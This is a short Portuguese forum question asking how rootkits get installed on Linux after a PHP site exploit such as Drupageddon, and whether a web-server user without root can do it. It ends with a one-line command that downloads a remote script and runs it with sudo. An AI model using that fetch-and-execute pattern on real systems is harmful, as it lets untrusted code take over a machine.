Eu vi alguns posts sobre a verificação de rootkits, mas não consegui encontrar nenhuma informação sobre como eles chegam ao sistema Linux. Em particular, se você explorar um bug em um site php (sim, eu estou falando sobre drupageddon aqui), é possível instalar um rootkit, mesmo que você possa executar apenas como servidor web (www-data) e não como root. As poucas informações que encontrei sobre como elas são instaladas sugerem que você precisa ser root para instalá-las (veja aqui ).
wget http://mydomain/script.sh;sudo ./script.sh